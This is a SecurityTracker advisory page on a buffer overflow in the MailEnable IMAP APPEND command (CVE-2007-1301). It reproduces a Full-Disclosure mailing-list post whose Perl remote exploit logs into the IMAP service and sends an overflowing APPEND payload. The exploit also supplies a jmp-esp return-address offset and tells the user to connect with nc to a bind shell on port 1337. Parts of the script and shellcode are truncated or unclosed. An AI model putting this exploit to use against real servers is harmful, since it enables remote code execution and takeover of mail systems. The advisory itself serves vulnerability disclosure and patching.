Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (E-mail Server)  >   MailEnable Vendors:   MailEnable Pty. Ltd.
MailEnable Buffer Overflow in IMAP APPEND Command Lets Remote Authenticated Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017739
SecurityTracker URL:
CVE Reference:   CVE-2007-1301   (Links to External Site)
Updated:  May 18 2008
Original Entry Date:  Mar 8 2007
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.37 and prior versions
Description:   A vulnerability was reported in MailEnable. A remote authenticated user can execute arbitrary code on the target system.

A remote authenticated user can a send specially crafted IMAP APPEND command to trigger a buffer overflow and cause the target IMAP service to crash or potentially execute arbitrary code.

mu-b at reported this vulnerability.

Impact:   A remote authenticated user can execute arbitrary code on the target system.
Solution:   The vendor has issued a fixed version (ME-10029), available at:

The MailEnable advisory is available at:

Vendor URL: (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (2003), Windows (XP)

Message History:   None.

 Source Message Contents

Subject:  [Full-disclosure] MailEnable v2.37 APPEND exploit

This is a multi-part message in MIME format.
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

Attached is another exploit for the MailEnable Pro/Ent <= 2.37 (including the
latest). The vulnerability is a bog-standard stack based overflow in the
call at offset 0x00417CD6 (MEIMAPS.exe, v2.37).


Content-Type: text/x-perl;
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;

# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit
# by mu-b - Wed Nov 29 2006
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#              Mail Enable Professional v2.33 (win32)
#              Mail Enable Professional v2.35 (win32)
#              Mail Enable Professional v2.37 (win32)

use Getopt::Std; getopts('t:n:u:p:', \%arg);
use Socket;

# Fixed metasploit win32 bindshell port 1337
my $zshell_win32_bind =
  "\x81\xc4\xd0\xfd\xff\xff". # add %esp, -560

# ff e4 -> jmp %esp
my @offsets = ( "\x63\x37\x57\x7c", # Win2K Server SP4 KERNEL32.dll
                "\xef\xbe\xad\xde"  # DoS


my $target;
my $offset;
my $user;
my $passwd;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (defined($arg{'u'})) { $user = $arg{'u'} }
if (defined($arg{'p'})) { $passwd = $arg{'p'} }
if (!(defined($target)) || !(defined($user)) || !(defined($passwd))) { &usage; }
if (!(defined($offset))) { $offset = 0; }
if ($offset > $#offsets) {
    print("only ".($#offsets+1)." targets known!!\n");
} else {
    $offset = $offsets[$offset];

my $imapd_port = 143;
my $send_delay = 2;

my $NOP = 'A';

if (connect_host($target, $imapd_port)) {
    print("-> * Connected\n");
    send(SOCKET, "1 LOGIN ".$user." ".$passwd."\r\n", 0);

    print("-> * Sending payload\n");
    $buf = "2 APPEND \"()\"\{".
           ($NOP x 128).
           ($NOP x 8 ).
    send(SOCKET, $buf, 0);

    print("-> * Successfully sent payload!\n");
    print("-> * nc ".$target." 1337 for shell...\n");

sub print_header {
    print("MailEnable Pro v2.32-7 remote exploit\n");
    print("by: <mu-b\>\n\n");

sub usage {
  print(qq(Usage: $0 -t <hostname>

     -t <hostname>    : hostname to test
     -n <num>         : return addy offset number
     -u <username>    : username for login
     -p <password>    : usernames password


sub connect_host {
    ($target, $port) = @_;
    $iaddr  = inet_aton($target)                 || die("Error: $!\n");
    $paddr  = sockaddr_in($port, $iaddr)         || die("Error: $!\n");
    $proto  = getprotobyname('tcp')              || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr)                      || die("Error: $!\n");

Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC